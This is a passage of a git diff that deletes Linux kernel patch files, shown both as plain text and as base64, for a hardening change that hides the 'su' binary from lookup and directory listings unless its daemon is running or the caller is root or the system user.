Jc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKKwkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7CisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQkJZXJyID0gLUVOT0VOVDsKKwkJfQorCX0KKwogb3V0OgogCWlmIChiYXNlKQogCQlmcHV0KGJhc2UpOwpkaWZmIC0tZ2l0IGEvZnMvcmVhZGRpci5jIGIvZnMvcmVhZGRpci5jCmluZGV4IDMzZmQ5MjIuLmIzMDg5YTEgMTAwNjQ0Ci0tLSBhL2ZzL3JlYWRkaXIuYworKysgYi9mcy9yZWFkZGlyLmMKQEAgLTM5LDYgKzM5LDcgQEAKIAlyZXMgPSAtRU5PRU5UOwogCWlmICghSVNfREVBRERJUihpbm9kZSkpIHsKIAkJY3R4LT5wb3MgPSBmaWxlLT5mX3BvczsKKwkJY3R4LT5yb21udCA9IChpbm9kZS0+aV9zYi0+c19mbGFncyAmIE1TX1JET05MWSk7CiAJCXJlcyA9IGZpbGUtPmZfb3AtPml0ZXJhdGUoZmlsZSwgY3R4KTsKIAkJZmlsZS0+Zl9wb3MgPSBjdHgtPnBvczsKIAkJZnNub3RpZnlfYWNjZXNzKGZpbGUpOwpAQCAtNDksNiArNTAsMTQgQEAKIAlyZXR1cm4gcmVzOwogfQogRVhQT1JUX1NZTUJPTChpdGVyYXRlX2Rpcik7CisKK3N0YXRpYyBib29sIGhpZGVfbmFtZShjb25zdCBjaGFyICpuYW1lLCBpbnQgbmFtbGVuKQoreworCWlmIChuYW1sZW4gPT0gMiAmJiAhbWVtY21wKG5hbWUsICJzdSIsIDIpKQorCQlpZiAoIXN1X3Zpc2libGUoKSkKKwkJCXJldHVybiB0cnVlOworCXJldHVybiBmYWxzZTsKK30KIAogLyoKICAqIFRyYWRpdGlvbmFsIGxpbnV4IHJlYWRkaXIoKSBoYW5kbGluZy4uCkBAIC04OCw2ICs5Nyw4IEBACiAJCWJ1Zi0+cmVzdWx0ID0gLUVPVkVSRkxPVzsKIAkJcmV0dXJuIC1FT1ZFUkZMT1c7CiAJfQorCWlmIChoaWRlX25hbWUobmFtZSwgbmFtbGVuKSAmJiBidWYtPmN0eC5yb21udCkKKwkJcmV0dXJuIDA7CiAJYnVmLT5yZXN1bHQrKzsKIAlkaXJlbnQgPSBidWYtPmRpcmVudDsKIAlpZiAoIWFjY2Vzc19vayhWRVJJRllfV1JJVEUsIGRpcmVudCwKQEAgLTE2NSw2ICsxNzYsOCBAQAogCQlidWYtPmVycm9yID0gLUVPVkVSRkxPVzsKIAkJcmV0dXJuIC1FT1ZFUkZMT1c7CiAJfQorCWlmIChoaWRlX25hbWUobmFtZSwgbmFtbGVuKSAmJiBidWYtPmN0eC5yb21udCkKKwkJcmV0dXJuIDA7CiAJZGlyZW50ID0gYnVmLT5wcmV2aW91czsKIAlpZiAoZGlyZW50KSB7CiAJCWlmIChfX3B1dF91c2VyKG9mZnNldCwgJmRpcmVudC0+ZF9vZmYpKQpAQCAtMjQzLDYgKzI1Niw4IEBACiAJYnVmLT5lcnJvciA9IC1FSU5WQUw7CS8qIG9ubHkgdXNlZCBpZiB3ZSBmYWlsLi4gKi8KIAlpZiAocmVjbGVuID4gYnVmLT5jb3VudCkKIAkJcmV0dXJuIC1FSU5WQUw7CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pICYmIGJ1Zi0+Y3R4LnJvbW50KQorCQlyZXR1cm4gMDsKIAlkaXJlbnQgPSBidWYtPnByZXZpb3VzOwogCWlmIChkaXJlbnQpIHsKIAkJaWYgKF9fcHV0X3VzZXIob2Zmc2V0LCAmZGlyZW50LT5kX29mZikpCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oIGIvaW5jbHVkZS9saW51eC9kY2FjaGUuaAppbmRleCAzY2Y0NDBmLi4xNmJjYTFhIDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oCisrKyBiL2luY2x1ZGUvbGludXgvZGNhY2hlLmgKQEAgLTQ2NSw2ICs0NjUsMTEgQEAKIAlyZXR1cm4gIWRfaXNfbmVnYXRpdmUoZGVudHJ5KTsKIH0KIAorc3RhdGljIGlubGluZSBib29sIGRfaXNfc3UoY29uc3Qgc3RydWN0IGRlbnRyeSAqZGVudHJ5KQoreworCXJldHVybiBkZW50cnktPmRfbmFtZS5sZW4gPT0gMiAmJiAhbWVtY21wKGRlbnRyeS0+ZF9uYW1lLm5hbWUsICJzdSIsIDIpOworfQorCiBleHRlcm4gaW50IHN5c2N0bF92ZnNfY2FjaGVfcHJlc3N1cmU7CiAKIHN0YXRpYyBpbmxpbmUgdW5zaWduZWQgbG9uZyB2ZnNfcHJlc3N1cmVfcmF0aW8odW5zaWduZWQgbG9uZyB2YWwpCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2ZzLmggYi9pbmNsdWRlL2xpbnV4L2ZzLmgKaW5kZXggMDYzMzRkZS4uNzU1YTM5MSAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9mcy5oCisrKyBiL2luY2x1ZGUvbGludXgvZnMuaApAQCAtMTQ5NSw2ICsxNDk1LDcgQEAKIHN0cnVjdCBkaXJfY29udGV4dCB7CiAJY29uc3QgZmlsbGRpcl90IGFjdG9yOwogCWxvZmZfdCBwb3M7CisJYm9vbCByb21udDsKIH07CiAKIHN0cnVjdCBibG9ja19kZXZpY2Vfb3BlcmF0aW9uczsKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvc2NoZWQuaCBiL2luY2x1ZGUvbGludXgvc2NoZWQuaAppbmRleCAzNTNhMjkxLi44M2FmNTE5IDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L3NjaGVkLmgKKysrIGIvaW5jbHVkZS9saW51eC9zY2hlZC5oCkBAIC02MSw2ICs2MSwxMiBAQAogCiAjaW5jbHVkZSA8YXNtL3Byb2Nlc3Nvci5oPgogCitpbnQgIHN1X2luc3RhbmNlcyh2b2lkKTsKK2Jvb2wgc3VfcnVubmluZyh2b2lkKTsKK2Jvb2wgc3VfdmlzaWJsZSh2b2lkKTsKK3ZvaWQgc3VfZXhlYyh2b2lkKTsKK3ZvaWQgc3VfZXhpdCh2b2lkKTsKKwogI2RlZmluZSBTQ0hFRF9BVFRSX1NJWkVfVkVSMAk0OAkvKiBzaXplb2YgZmlyc3QgcHVibGlzaGVkIHN0cnVjdCAqLwogCiAvKgpAQCAtMjA3Myw2ICsyMDc5LDggQEAKICNkZWZpbmUgUEZfRlJFRVpFUl9TS0lQCTB4NDAwMDAwMDAJLyogRnJlZXplciBzaG91bGQgbm90IGNvdW50IGl0IGFzIGZyZWV6YWJsZSAqLwogI2RlZmluZSBQRl9TVVNQRU5EX1RBU0sgMHg4MDAwMDAwMCAgICAgIC8qIHRoaXMgdGhyZWFkIGNhbGxlZCBmcmVlemVfcHJvY2Vzc2VzIGFuZCBzaG91bGQgbm90IGJlIGZyb3plbiAqLwogCisjZGVmaW5lIFBGX1NVCQkweDEwMDAwMDAwICAgICAgLyogdGFzayBpcyBzdSAqLworCiAvKgogICogT25seSB0aGUgX2N1cnJlbnRfIHRhc2sgY2FuIHJlYWQvd3JpdGUgdG8gdHNrLT5mbGFncywgYnV0IG90aGVyCiAgKiB0YXNrcyBjYW4gYWNjZXNzIHRzay0+ZmxhZ3MgaW4gcmVhZG9ubHkgbW9kZSBmb3IgZXhhbXBsZQpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC91aWRnaWQuaCBiL2luY2x1ZGUvbGludXgvdWlkZ2lkLmgKaW5kZXggMmQxZjliNi4uZWYyNmYzZiAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC91aWRnaWQuaAorKysgYi9pbmNsdWRlL2xpbnV4L3VpZGdpZC5oCkBAIC00Miw2ICs0Miw5IEBACiAjZGVmaW5lIEdMT0JBTF9ST09UX1VJRCBLVUlEVF9JTklUKDApCiAjZGVmaW5lIEdMT0JBTF9ST09UX0dJRCBLR0lEVF9JTklUKDApCiAKKyNkZWZpbmUgR0xPQkFMX1NZU1RFTV9VSUQgS1VJRFRfSU5JVCgxMDAwKQorI2RlZmluZSBHTE9CQUxfU1lTVEVNX0dJRCBLR0lEVF9JTklUKDEwMDApCisKICNkZWZpbmUgSU5WQUxJRF9VSUQgS1VJRFRfSU5JVCgtMSkKICNkZWZpbmUgSU5WQUxJRF9HSUQgS0dJRFRfSU5JVCgtMSkKIApkaWZmIC0tZ2l0IGEva2VybmVsL2V4aXQuYyBiL2tlcm5lbC9leGl0LmMKaW5kZXggMzEwMDNjNy4uZDNhOTYyZSAxMDA2NDQKLS0tIGEva2VybmVsL2V4aXQuYworKysgYi9rZXJuZWwvZXhpdC5jCkBAIC03MzAsNiArNzMwLDEwIEBACiAKIAlzY2hlZF9leGl0KHRzayk7CiAKKwlpZiAodHNrLT5mbGFncyAmIFBGX1NVKSB7CisJCXN1X2V4aXQoKTsKKwl9CisKIAkvKgogCSAqIHRzay0+ZmxhZ3MgYXJlIGNoZWNrZWQgaW4gdGhlIGZ1dGV4IGNvZGUgdG8gcHJvdGVjdCBhZ2FpbnN0CiAJICogYW4gZXhpdGluZyB0YXNrIGNsZWFuaW5nIHVwIHRoZSByb2J1c3QgcGkgZnV0ZXhlcy4KZGlmZiAtLWdpdCBhL2tlcm5lbC9mb3JrLmMgYi9rZXJuZWwvZm9yay5jCmluZGV4IDYwMDk1NmIuLjM5MGRiYzMgMTAwNjQ0Ci0tLSBhL2tlcm5lbC9mb3JrLmMKKysrIGIva2VybmVsL2ZvcmsuYwpAQCAtMzM5LDYgKzMzOSw4IEBACiAJaWYgKGVycikKIAkJZ290byBmcmVlX3RpOwogCisJdHNrLT5mbGFncyAmPSB+UEZfU1U7CisKIAl0c2stPnN0YWNrID0gdGk7CiAjaWZkZWYgQ09ORklHX1NFQ0NPTVAKIAkvKgpkaWZmIC0tZ2l0IGEva2VybmVsL3NjaGVkL2NvcmUuYyBiL2tlcm5lbC9zY2hlZC9jb3JlLmMKaW5kZXggZTdkMzM2Ny4uNzRiMjY4ZjQgMTAwNjQ0Ci0tLSBhL2tlcm5lbC9zY2hlZC9jb3JlLmMKKysrIGIva2VybmVsL3NjaGVkL2NvcmUuYwpAQCAtOTYsNiArOTYsMzggQEAKICNkZWZpbmUgQ1JFQVRFX1RSQUNFX1BPSU5UUwogI2luY2x1ZGUgPHRyYWNlL2V2ZW50cy9zY2hlZC5oPgogCitzdGF0aWMgYXRvbWljX3QgX19zdV9pbnN0YW5jZXM7CisKK2ludCBzdV9pbnN0YW5jZXModm9pZCkKK3sKKwlyZXR1cm4gYXRvbWljX3JlYWQoJl9fc3VfaW5zdGFuY2VzKTsKK30KKworYm9vbCBzdV9ydW5uaW5nKHZvaWQpCit7CisJcmV0dXJuIHN1X2luc3RhbmNlcygpID4gMDsKK30KKworYm9vbCBzdV92aXNpYmxlKHZvaWQpCit7CisJa3VpZF90IHVpZCA9IGN1cnJlbnRfdWlkKCk7CisJaWYgKHN1X3J1bm5pbmcoKSkKKwkJcmV0dXJuIHRydWU7CisJaWYgKHVpZF9lcSh1aWQsIEdMT0JBTF9ST09UX1VJRCkgfHwgdWlkX2VxKHVpZCwgR0xPQkFMX1NZU1RFTV9VSUQpKQorCQlyZXR1cm4gdHJ1ZTsKKwlyZXR1cm4gZmFsc2U7Cit9CisKK3ZvaWQgc3VfZXhlYyh2b2lkKQoreworCWF0b21pY19pbmMoJl9fc3VfaW5zdGFuY2VzKTsKK30KKwordm9pZCBzdV9leGl0KHZvaWQpCit7CisJYXRvbWljX2RlYygmX19zdV9pbnN0YW5jZXMpOworfQorCiBjb25zdCBjaGFyICp0YXNrX2V2ZW50X25hbWVzW10gPSB7IlBVVF9QUkVWX1RBU0siLCAiUElDS19ORVhUX1RBU0siLAogCQkJCSAgIlRBU0tfV0FLRSIsICJUQVNLX01JR1JBVEUiLCAiVEFTS19VUERBVEUiLAogCQkJCSJJUlFfVVBEQVRFIn07Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch
deleted file mode 100644
index 488015a9..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From 70cfbfda0071b16160b82835a757ebecd14dc48b Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Fri, 28 Apr 2017 22:46:37 +0000
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-Note: this is for the 3.4 kernel and lacks the read-only mount point
-logic due to the non-extensible readdir implementation.
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled.  Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: Ia7d50ba46c3d932c2b0ca5fc8e9ec69ec9045f85
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index a4d05ce..b8c9af0 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1591,6 +1591,11 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+		current->flags |= PF_SU;
-+		su_exec();
-+	}
-+
- 	/* execve succeeded */
- 	current->fs->in_exec = 0;
- 	current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index df12b57..0446469 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1800,6 +1800,11 @@
- 		}
- 	}
- 
-+	if (!err) {
-+		if (d_is_su(nd->path.dentry) && !su_visible())
-+			err = -ENOENT;
-+	}
-+
- 	if (base)
- 		fput(base);
- 
-diff --git a/fs/readdir.c b/fs/readdir.c
-index cc0a822..106f156 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -47,6 +47,14 @@
- 
- EXPORT_SYMBOL(vfs_readdir);
- 
-+static bool hide_name(const char *name, int namlen)
-+{
-+	if (namlen == 2 && !memcmp(name, "su", 2))
-+		if (!su_visible())
-+			return true;
-+	return false;
-+}
-+
- /*
-  * Traditional linux readdir() handling..
-  *
-@@ -84,6 +92,8 @@
- 		buf->result = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen))
-+		return 0;
- 	buf->result++;
- 	dirent = buf->dirent;
- 	if (!access_ok(VERIFY_WRITE, dirent,
-@@ -163,6 +173,8 @@
- 		buf->error = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen))
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-@@ -244,6 +256,8 @@
- 	buf->error = -EINVAL;	/* only used if we fail.. */
- 	if (reclen > buf->count)
- 		return -EINVAL;
-+	if (hide_name(name, namlen))
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 92e9d19..13efe38 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -403,6 +403,11 @@
- 
- extern void d_clear_need_lookup(struct dentry *dentry);
- 
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+	return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
- 
- #endif	/* __LINUX_DCACHE_H */
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 28f14d2..17962ef 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -93,6 +93,12 @@
- 
- #include <asm/processor.h>
- 
-+int  su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- struct exec_domain;
- struct futex_pi_state;
- struct robust_list_head;
-@@ -2008,6 +2014,8 @@
- TASK_PFA_SET(SPREAD_SLAB, spread_slab)
- TASK_PFA_CLEAR(SPREAD_SLAB, spread_slab)
- 
-+#define PF_SU		0x10000000      /* task is su */
-+
- /*
-  * Do not use outside of architecture code which knows its limitations.
-  *
-diff --git a/kernel/exit.c b/kernel/exit.c
-index f28427b..3eafd26 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -957,6 +957,11 @@
- 	}
- 
- 	exit_signals(tsk);  /* sets PF_EXITING */
-+
-+	if (tsk->flags & PF_SU) {
-+		su_exit();
-+	}
-+
- 	/*
- 	 * tsk->flags are checked in the futex code to protect against
- 	 * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 75dc3dd..23695d2 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -295,6 +295,8 @@
- 	if (err)
- 		goto out;
- 
-+	tsk->flags &= ~PF_SU;
-+
- 	tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- 	/*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index 5c06094..04fa21e 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -89,6 +89,38 @@
- #define CREATE_TRACE_POINTS
- #include <trace/events/sched.h>
- 
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+	return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+	return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+	uid_t uid = current_uid();
-+	if (su_running())
-+		return true;
-+	if (uid == 0 || uid == 1000)
-+		return true;
-+	return false;
-+}
-+
-+void su_exec(void)
-+{
-+	atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+	atomic_dec(&__su_instances);
-+}
-+
- ATOMIC_NOTIFIER_HEAD(migration_notifier_head);
- 
- void start_bandwidth_timer(struct hrtimer *period_timer, ktime_t period)
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64
deleted file mode 100644
index a35dda38..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA3MGNmYmZkYTAwNzFiMTYxNjBiODI4MzVhNzU3ZWJlY2QxNGRjNDhiIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAyOCBBcHIgMjAxNyAyMjo0NjozNyArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogT25seSBleHBvc2Ugc3Ugd2hlbiBkYWVtb24gaXMgcnVubmluZwoKTm90ZTogdGhpcyBpcyBmb3IgdGhlIDMuNCBrZXJuZWwgYW5kIGxhY2tzIHRoZSByZWFkLW9ubHkgbW91bnQgcG9pbnQKbG9naWMgZHVlIHRvIHRoZSBub24tZXh0ZW5zaWJsZSByZWFkZGlyIGltcGxlbWVudGF0aW9uLgoKSXQgaGFzIGJlZW4gY2xhaW1lZCB0aGF0IHRoZSBQRyBpbXBsZW1lbnRhdGlvbiBvZiAnc3UnIGhhcyBzZWN1cml0eQp2dWxuZXJhYmlsaXRpZXMgZXZlbiB3aGVuIGRpc2FibGVkLiAgVW5mb3J0dW5hdGVseSwgdGhlIHBlb3BsZSB0aGF0CmZpbmQgdGhlc2UgdnVsbmVyYWJpbGl0aWVzIG9mdGVuIGxpa2UgdG8ga2VlcCB0aGVtIHByaXZhdGUgc28gdGhleQpjYW4gcHJvZml0IGZyb20gZXhwbG9pdHMgd2hpbGUgbGVhdmluZyB1c2VycyBleHBvc2VkIHRvIG1hbGljaW91cwpoYWNrZXJzLgoKSW4gb3JkZXIgdG8gcmVkdWNlIHRoZSBhdHRhY2sgc3VyZmFjZSBmb3IgdnVsbmVyYWJpbGl0ZXMsIGl0IGlzCnRoZXJlZm9yZSBuZWNlc3NhcnkgdG8gbWFrZSAnc3UnIGNvbXBsZXRlbHkgaW5hY2Nlc3NpYmxlIHdoZW4gaXQKaXMgbm90IGluIHVzZSAoZXhjZXB0IGJ5IHRoZSByb290IGFuZCBzeXN0ZW0gdXNlcnMpLgoKQ2hhbmdlLUlkOiBJYTdkNTBiYTQ2YzNkOTMyYzJiMGNhNWZjOGU5ZWM2OWVjOTA0NWY4NQotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggYTRkMDVjZS4uYjhjOWFmMCAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTU5MSw2ICsxNTkxLDExIEBACiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCisJaWYgKGNhcGFibGUoQ0FQX1NZU19BRE1JTikgJiYgZF9pc19zdShmaWxlLT5mX2RlbnRyeSkpIHsKKwkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CisJCXN1X2V4ZWMoKTsKKwl9CisKIAkvKiBleGVjdmUgc3VjY2VlZGVkICovCiAJY3VycmVudC0+ZnMtPmluX2V4ZWMgPSAwOwogCWN1cnJlbnQtPmluX2V4ZWN2ZSA9IDA7CmRpZmYgLS1naXQgYS9mcy9uYW1laS5jIGIvZnMvbmFtZWkuYwppbmRleCBkZjEyYjU3Li4wNDQ2NDY5IDEwMDY0NAotLS0gYS9mcy9uYW1laS5jCisrKyBiL2ZzL25hbWVpLmMKQEAgLTE4MDAsNiArMTgwMCwxMSBAQAogCQl9CiAJfQogCisJaWYgKCFlcnIpIHsKKwkJaWYgKGRfaXNfc3UobmQtPnBhdGguZGVudHJ5KSAmJiAhc3VfdmlzaWJsZSgpKQorCQkJZXJyID0gLUVOT0VOVDsKKwl9CisKIAlpZiAoYmFzZSkKIAkJZnB1dChiYXNlKTsKIApkaWZmIC0tZ2l0IGEvZnMvcmVhZGRpci5jIGIvZnMvcmVhZGRpci5jCmluZGV4IGNjMGE4MjIuLjEwNmYxNTYgMTAwNjQ0Ci0tLSBhL2ZzL3JlYWRkaXIuYworKysgYi9mcy9yZWFkZGlyLmMKQEAgLTQ3LDYgKzQ3LDE0IEBACiAKIEVYUE9SVF9TWU1CT0wodmZzX3JlYWRkaXIpOwogCitzdGF0aWMgYm9vbCBoaWRlX25hbWUoY29uc3QgY2hhciAqbmFtZSwgaW50IG5hbWxlbikKK3sKKwlpZiAobmFtbGVuID09IDIgJiYgIW1lbWNtcChuYW1lLCAic3UiLCAyKSkKKwkJaWYgKCFzdV92aXNpYmxlKCkpCisJCQlyZXR1cm4gdHJ1ZTsKKwlyZXR1cm4gZmFsc2U7Cit9CisKIC8qCiAgKiBUcmFkaXRpb25hbCBsaW51eCByZWFkZGlyKCkgaGFuZGxpbmcuLgogICoKQEAgLTg0LDYgKzkyLDggQEAKIAkJYnVmLT5yZXN1bHQgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlidWYtPnJlc3VsdCsrOwogCWRpcmVudCA9IGJ1Zi0+ZGlyZW50OwogCWlmICghYWNjZXNzX29rKFZFUklGWV9XUklURSwgZGlyZW50LApAQCAtMTYzLDYgKzE3Myw4IEBACiAJCWJ1Zi0+ZXJyb3IgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlkaXJlbnQgPSBidWYtPnByZXZpb3VzOwogCWlmIChkaXJlbnQpIHsKIAkJaWYgKF9fcHV0X3VzZXIob2Zmc2V0LCAmZGlyZW50LT5kX29mZikpCkBAIC0yNDQsNiArMjU2LDggQEAKIAlidWYtPmVycm9yID0gLUVJTlZBTDsJLyogb25seSB1c2VkIGlmIHdlIGZhaWwuLiAqLwogCWlmIChyZWNsZW4gPiBidWYtPmNvdW50KQogCQlyZXR1cm4gLUVJTlZBTDsKKwlpZiAoaGlkZV9uYW1lKG5hbWUsIG5hbWxlbikpCisJCXJldHVybiAwOwogCWRpcmVudCA9IGJ1Zi0+cHJldmlvdXM7CiAJaWYgKGRpcmVudCkgewogCQlpZiAoX19wdXRfdXNlcihvZmZzZXQsICZkaXJlbnQtPmRfb2ZmKSkKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmggYi9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oCmluZGV4IDkyZTlkMTkuLjEzZWZlMzggMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmgKKysrIGIvaW5jbHVkZS9saW51eC9kY2FjaGUuaApAQCAtNDAzLDYgKzQwMywxMSBAQAogCiBleHRlcm4gdm9pZCBkX2NsZWFyX25lZWRfbG9va3VwKHN0cnVjdCBkZW50cnkgKmRlbnRyeSk7CiAKK3N0YXRpYyBpbmxpbmUgYm9vbCBkX2lzX3N1KGNvbnN0IHN0cnVjdCBkZW50cnkgKmRlbnRyeSkKK3sKKwlyZXR1cm4gZGVudHJ5LT5kX25hbWUubGVuID09IDIgJiYgIW1lbWNtcChkZW50cnktPmRfbmFtZS5uYW1lLCAic3UiLCAyKTsKK30KKwogZXh0ZXJuIGludCBzeXNjdGxfdmZzX2NhY2hlX3ByZXNzdXJlOwogCiAjZW5kaWYJLyogX19MSU5VWF9EQ0FDSEVfSCAqLwpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC9zY2hlZC5oIGIvaW5jbHVkZS9saW51eC9zY2hlZC5oCmluZGV4IDI4ZjE0ZDIuLjE3OTYyZWYgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvc2NoZWQuaAorKysgYi9pbmNsdWRlL2xpbnV4L3NjaGVkLmgKQEAgLTkzLDYgKzkzLDEyIEBACiAKICNpbmNsdWRlIDxhc20vcHJvY2Vzc29yLmg+CiAKK2ludCAgc3VfaW5zdGFuY2VzKHZvaWQpOworYm9vbCBzdV9ydW5uaW5nKHZvaWQpOworYm9vbCBzdV92aXNpYmxlKHZvaWQpOwordm9pZCBzdV9leGVjKHZvaWQpOwordm9pZCBzdV9leGl0KHZvaWQpOworCiBzdHJ1Y3QgZXhlY19kb21haW47CiBzdHJ1Y3QgZnV0ZXhfcGlfc3RhdGU7CiBzdHJ1Y3Qgcm9idXN0X2xpc3RfaGVhZDsKQEAgLTIwMDgsNiArMjAxNCw4IEBACiBUQVNLX1BGQV9TRVQoU1BSRUFEX1NMQUIsIHNwcmVhZF9zbGFiKQogVEFTS19QRkFfQ0xFQVIoU1BSRUFEX1NMQUIsIHNwcmVhZF9zbGFiKQogCisjZGVmaW5lIFBGX1NVCQkweDEwMDAwMDAwICAgICAgLyogdGFzayBpcyBzdSAqLworCiAvKgogICogRG8gbm90IHVzZSBvdXRzaWRlIG9mIGFyY2hpdGVjdHVyZSBjb2RlIHdoaWNoIGtub3dzIGl0cyBsaW1pdGF0aW9ucy4KICAqCmRpZmYgLS1naXQgYS9rZXJuZWwvZXhpdC5jIGIva2VybmVsL2V4aXQuYwppbmRleCBmMjg0MjdiLi4zZWFmZDI2IDEwMDY0NAotLS0gYS9rZXJuZWwvZXhpdC5jCisrKyBiL2tlcm5lbC9leGl0LmMKQEAgLTk1Nyw2ICs5NTcsMTEgQEAKIAl9CiAKIAlleGl0X3NpZ25hbHModHNrKTsgIC8qIHNldHMgUEZfRVhJVElORyAqLworCisJaWYgKHRzay0+ZmxhZ3MgJiBQRl9TVSkgeworCQlzdV9leGl0KCk7CisJfQorCiAJLyoKIAkgKiB0c2stPmZsYWdzIGFyZSBjaGVja2VkIGluIHRoZSBmdXRleCBjb2RlIHRvIHByb3RlY3QgYWdhaW5zdAogCSAqIGFuIGV4aXRpbmcgdGFzayBjbGVhbmluZyB1cCB0aGUgcm9idXN0IHBpIGZ1dGV4ZXMuCmRpZmYgLS1naXQgYS9rZXJuZWwvZm9yay5jIGIva2VybmVsL2ZvcmsuYwppbmRleCA3NWRjM2RkLi4yMzY5NWQyIDEwMDY0NAotLS0gYS9rZXJuZWwvZm9yay5jCisrKyBiL2tlcm5lbC9mb3JrLmMKQEAgLTI5NSw2ICsyOTUsOCBAQAogCWlmIChlcnIpCiAJCWdvdG8gb3V0OwogCisJdHNrLT5mbGFncyAmPSB+UEZfU1U7CisKIAl0c2stPnN0YWNrID0gdGk7CiAjaWZkZWYgQ09ORklHX1NFQ0NPTVAKIAkvKgpkaWZmIC0tZ2l0IGEva2VybmVsL3NjaGVkL2NvcmUuYyBiL2tlcm5lbC9zY2hlZC9jb3JlLmMKaW5kZXggNWMwNjA5NC4uMDRmYTIxZSAxMDA2NDQKLS0tIGEva2VybmVsL3NjaGVkL2NvcmUuYworKysgYi9rZXJuZWwvc2NoZWQvY29yZS5jCkBAIC04OSw2ICs4OSwzOCBAQAogI2RlZmluZSBDUkVBVEVfVFJBQ0VfUE9JTlRTCiAjaW5jbHVkZSA8dHJhY2UvZXZlbnRzL3NjaGVkLmg+CiAKK3N0YXRpYyBhdG9taWNfdCBfX3N1X2luc3RhbmNlczsKKworaW50IHN1X2luc3RhbmNlcyh2b2lkKQoreworCXJldHVybiBhdG9taWNfcm